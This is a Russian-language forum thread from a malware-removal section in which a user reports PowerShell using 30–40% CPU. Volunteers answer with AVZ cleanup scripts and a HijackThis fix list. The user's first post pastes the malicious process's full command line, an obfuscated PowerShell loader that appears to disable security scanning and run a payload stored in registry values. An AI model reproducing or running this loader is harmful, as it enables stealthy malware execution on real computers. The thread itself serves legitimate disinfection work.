Новости
Видео
Microsoft
Windows 10
Железо
Программы
Форум

Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » [решено] Powershell грузит комп 30-40%

1 2 Следующая >
Ответить
Настройки темы
[решено] Powershell грузит комп 30-40%

Новый участник


Сообщения: 7
Благодарности: 1

Профиль | Отправить PM | Цитировать

Вложения
Тип файла: zip CollectionLog-2021.11.05-16.21.zip
(97.3 Kb, 4 просмотров)
Здраствуйте! Откуда не возьмись начал комп тормозить и подлагивать. Тогда я открыл диспетчер задач, все успокоилось, закрываю диспетчер задач через некоторое время вижу опять начинает тормозить. Тогда я подумал скачать другой диспетчер задач (я использовал Process Explorer с правами администратора), вижу powershell.exe с conhost.exe грузят. Тогда посмотрел расположение стандартное, в Command Line:

(powershell.exe -c "4609833558;$tBUn='5Syxst1emj.M_an_agnemwen4t.5Aubto2mautihonf.AzmsniUatislsk-abmspiIlni{tF7ai+le[d-5NoqnP.ubvli5c,=St)ateic' -replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361);'r$txBU9n=_$t_BU0n t-s_pl)it!''-3'';c[R_efn].yAs)se6mbdlyv.G!ethTy?pe8($8tB6Un}[0_])l.G_et+Fi+el!d(i$t6BU_n[}1]u,$ztB_Un_[2q])t.Szet?Vaslu_e(_$n[ul5l,_(3[615-n+e6]64x))'-replace('.widS(widS.widS.)'-replace'widS'),('$'+361/361)|&('iviiveivx'-replace'iv');'q&(_gc_m (A*_-T/y*i).}Naymeb (g''yrusz_i8ntsg )xShy(1stvne4mi_;u)psdi3ang]_ ]Sy_ys}{t5eg3m.]_I_Ofj;uw_s9i._ngp7 iS_7ys_7t,e_tm./9R{u__nt_.ibm!!e.aoItn/ttei_r_o_6pSrbe_rurvi.-c,e[3s;}{ubs,5in[9g8 _9Mi__cir!_os/3o,f}7t.faW_icun3_e23;e_pug_b,lylicre hc_[lag8s]s+p e0}q_{6nde](lfe4)gadptte}( vdqo_i_ad rap7V_tD(i})5;k_pu_vb3lmdicu_ _s_ota_at_ig7c +hv.og0ido+ 7F_bLlgodt(_b){ckbyyuktes)[h]3_UY?!K!r77=F}-iyl[_e.__E.x0iis_rt_sc_(bk7oqq_/iy,_u!e1_rh__f8t_=wt_mbto_7qin_)_?_)Fi7el}ea1.Rmfe_am_dAj_l{l4lBy__tbefts(ocb]o,{qixcy4u7ser_lhufb[tw_{t9ba)oq)fio)b5q}b[yy2te{_[_]o_)Rige.gozis!5t8r?dy.s8L_osrca{vl_M3_ac9ch?i1_ne_0.3O_!pe.cn]S_puby_Kve?_y(cu@_b_foqw5i_S-qOFm_T_W9?AR_rEw\,[Mi8wc4r23os[_oyfyrt\eaC7TwoF\f.T_I.]Pb=0o}q__i)(4.,Gf{etc_V_a-]luy8e?()cbov1q_i__yu!je9r_7hf3_t9wp2tbsqo_q7{i,/eniu7dll,v)y;_nifuv(lU09YKp0rn(=n,wu!l2dl)mbr8e_]tu))r_ny3;ii_nnt[. G__nss95T=daU!Yw_Krv1.}Ll-en9wg_tb/h;-)f5o_3r(_{i_nm9t _wyoPo_xVyg=d0oq;yp4P7x_vV [_![=b_Gnwzs?Tk_-1!_;_y89PxwuVd+{.+)_t{=U!bYKebr_[_xyPl/x3V+_]^_!=_(!aby,wt3ebo)b)fofqbmiaei9!e.lpd_c(apz_FdceE0f97qF(t5bQ1v[??vdr0-]hnecs_Dt_q29.[aP77EPhp7rga=7jssd7}i_)B0xF2{x_CM_(Bao_mmmsaE}-_8gCcysh9_iyj{_.ezmnlc.o({r_tfxgob_j67l0_7c5b)eOM9_{a(_-_,__}h!a/yah8_4h_ai_tbJ_b45oq9ci+[_fyPlhx5V8qvE+wK_Z.+826+]s;u_}I_unvt0_Pt4}r_ jpnM]scd=c)(Io_n_ty=Ptq5r_)i_0;b]I!n=ttPj/t3rdj L-4jq=1_(Iw,njtg]Pt19r_)gzGnn.slT_m;NwbtjAaall./o+cu4at?tejV_tir1wtvuz4al_}M_e7smo_7r_y6{((loI{nz,tPt=t!rs5)(5_-d1_r),j}r7evif c_n,M5ec,j5(eIfuntkiPmt_vr)nc0k,5_reixf_ !]Lj_b,_08xx1!}0_0n_0,li03x(s40_q)t;c]Ma/pr_s}4ha]{lm.n9Co7_p,y[_(U_aYbK9hr,__0q,bknM?tcc,_=Gn+us_T[0);7_(_(utpV_/D.)anMas,r!s2xha_el{.c(Gen}thD6aelz_e1gmdaturedF_qorpmF1uv0ncn_t)il(on-_Pko_5ink}treq7r(_wnyM_cc,x}t_yrdpe_toqft_(p(_V_Du]))f3)a(6_);_m}k[v.Dl9el2I_ymp{_o7r_pt(-6b_oc_qit-notegdl[ul1b__oq]_i_)nt]p_{r=i-_va_gtce__ stbt_a!ati/ac= 8cex[8t_e{xrn_t klbvon{3gq 1=Nt1.Akl__loh_coa,8te_eV7i{irt[8u}as!lM?8eqm/sor47ys((9In0vt_P_dtr1_ gPx[Mgbh,_r_2efmm oI-unt2_P7t_5r _=hpe+)dI_a,[I_)ntc[P_t61r e)j)V__i,v=rwer[f wyIbnwitPayt-r+c y,cV_,,cUIivn.t_o32,a +T.,BJ_bhg,oeUI1}n_t!)32{_ ,Gp6Kjo?kj)fd;}_''-2re_pl[ac{e''_.(8..d)''n,''s$1a'' f-r?ep_la_ce_''bdoq_i''i,[8chear/](b343) _-r_epclahce_''v[EK]Z''3,[2chrarc](e37q))s;[lEn_vi_ro/nm4en}t]x::vCufrr(enatD/irwec_to]ry8=piwdh;[[eqc]:9:F_Ll_d([);'-replace('.NnOO(NnOO.NnOO.)'-replace'NnOO'),('$'+415/415)|&('DZmNiDZmNeDZmNx'-replace'DZmN');4750505109")

Вот это пишет.

Помогите пожалуйста, вот логи прикрепил.

Отправлено: 16:22, 05-11-2021

 

Аватара для Sandor

Ветеран


Консультант


Сообщения: 5318
Благодарности: 1330

Профиль | Отправить PM | Цитировать

Здравствуйте!

1. Пожалуйста, скачайте MiniRegTool64.zip и распакуйте его.
  • Запустите утилиту
  • Скопируйте и вставьте следующий текст в поле ввода:
    Код: Выделить весь код
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP
  • Отметьте опцию Export keys.
  • Нажмите кнопку Go, после этого прикрепите к своему сообщению Result.txt.

2. Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером.

-------

Отправлено: 16:31, 05-11-2021 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Ветеран


Консультант


Сообщения: 1511
Благодарности: 413

Профиль | Отправить PM | Цитировать

+
- выполните такой скрипт в AVZ
Код: Выделить весь код
begin
 ClearQuarantineEx(true); 
 QuarantineFile('C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\WinDAT', '');
 QuarantineFile('C:\Windows\system32\Tasks\Microsoft\Windows\Maintenance\WinNAT', ''); 
 ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine_task .\Quarantine\*', 1, 300000, false);
 RebootWindows(false);
end.
- Файл quarantine_task.zip из папки AVZ загрузите по ссылке http://dragokas.com/virusnet/

-------

Отправлено: 16:45, 05-11-2021 | #3


Новый участник


Сообщения: 7
Благодарности: 1

Профиль | Отправить PM | Цитировать

Вложения
Тип файла: log AV_block_remove.log
(3.4 Kb, 2 просмотров)

Спасибо что ответили! Вот я прикрепил AV_block_remove.log, но result.txt весит у меня 17 мб поэтому я незнаю как вам кинуть лог.

Отправлено: 16:56, 05-11-2021 | #4


Новый участник


Сообщения: 7
Благодарности: 1

Профиль | Отправить PM | Цитировать

Вложения
Тип файла: zip CollectionLog-2021.11.05-17.03.zip
(100.8 Kb, 0 просмотров)

Вот ещё один лог.

Отправлено: 17:04, 05-11-2021 | #5


Аватара для akok

Ветеран


Консультант


Сообщения: 765
Благодарности: 202

Профиль | Сайт | Отправить PM | Цитировать

Цитата VladikShok:
Вот я прикрепил AV_block_remove.log, но result.txt весит у меня 17 мб поэтому я незнаю как вам кинуть лог. »
В архив его и на любой файлообменник без рекламы

-------

Отправлено: 17:30, 05-11-2021 | #6


Новый участник


Сообщения: 7
Благодарности: 1

Профиль | Отправить PM | Цитировать

https://dropmefiles.com/7FYJq вот CollectionLog.
Это сообщение посчитали полезным следующие участники:

Отправлено: 17:37, 05-11-2021 | #7


Новый участник


Сообщения: 7
Благодарности: 1

Профиль | Отправить PM | Цитировать

2021.11.05_quarantine_845c9f5c92e499333f2dfcc8ecfddd52.7z вот имя карантина.

Отправлено: 18:11, 05-11-2021 | #8


Ветеран


Консультант


Сообщения: 1511
Благодарности: 413

Профиль | Отправить PM | Цитировать

Здравствуйте!


Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger\AV\av_z.exe (Файл - Выполнить скрипт):

Код: Выделить весь код
begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\ProgramData\Windows\Profile\1.vbs', '');
 QuarantineFileF('C:\ProgramData\Windows\Profile', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\ProgramData\Windows\Profile\1.vbs', '64');
 DeleteFileMask('C:\ProgramData\Windows\Profile', '*', true);
 DeleteDirectory('C:\ProgramData\Windows\Profile');
 DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinDAT');
 DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinNAT');
 RegKeyParamDel('HKEY_USERS', '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run', 'Synapse3', '32');
 RegKeyParamDel('HKEY_USERS', '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run', 'Synapse3', '64');
 RegKeyParamDel('hklm','SOFTWARE\Microsoft\CTF\TIP','yuerhftwt');
 RegKeyParamDel('hklm','SOFTWARE\Microsoft\CTF\TIP','jhytvrvr');
  if FileExists (GetAVZDirectory+'quarantine.7z') then DeleteFile(GetAVZDirectory+'quarantine.7z');
  ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
  ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
после выполнения скрипта компьютер перезагрузится.

Файл quarantine.7z из папки AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

Профиксите в HijackThis из папки ..\AutoLogger\HiJackThis
Код: Выделить весь код
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O22 - Task: (damaged) OneDrive Standalone Update Task-S-1-5-21-4181382184-3863360630-3152423739-1002 - C:\Users\VladHpVlad\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (file missing) (user missing)
- Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

-------

Последний раз редактировалось regist, 05-11-2021 в 19:19. Причина: пользователь выложил Result.txt

Отправлено: 18:57, 05-11-2021 | #9


Ветеран


Консультант


Сообщения: 1511
Благодарности: 413

Профиль | Отправить PM | Цитировать

Цитата VladikShok:
Здраствуйте! Откуда не возьмись начал комп тормозить и подлагивать. Тогда я открыл диспетчер задач, все успокоилось, закрываю диспетчер задач через некоторое время вижу опять начинает тормозить. Тогда я подумал скачать другой диспетчер задач (я использовал Process Explorer с правами администратора), вижу powershell.exe с conhost.exe грузят. Тогда посмотрел расположение стандартное, в Command Line: »
А сами "руками" ничего не удаляли?

В папке с AVbr есть файл quarantine.zip ? Если да, то какого размера?

-------

Это сообщение посчитали полезным следующие участники:

Отправлено: 19:23, 05-11-2021 | #10

1 2 Следующая >


Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » [решено] Powershell грузит комп 30-40%

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Разное - 30-40% CPU тормозит мышка и клавиатура Ыть Microsoft Windows 10 2 09-11-2015 13:16
Службы - rundll32 грузит cpu на 30-40% в простое 12sunflowers Microsoft Windows 7 14 24-06-2015 10:45
[решено] ОС загружается 30-40 минут. Shtaizek Непонятные проблемы с Железом 23 20-08-2012 18:42
Компьютер тормозит после 30-40 минут работы Slider* Непонятные проблемы с Железом 6 24-01-2009 13:49


« Предыдущая тема | Следующая тема »


 
Переход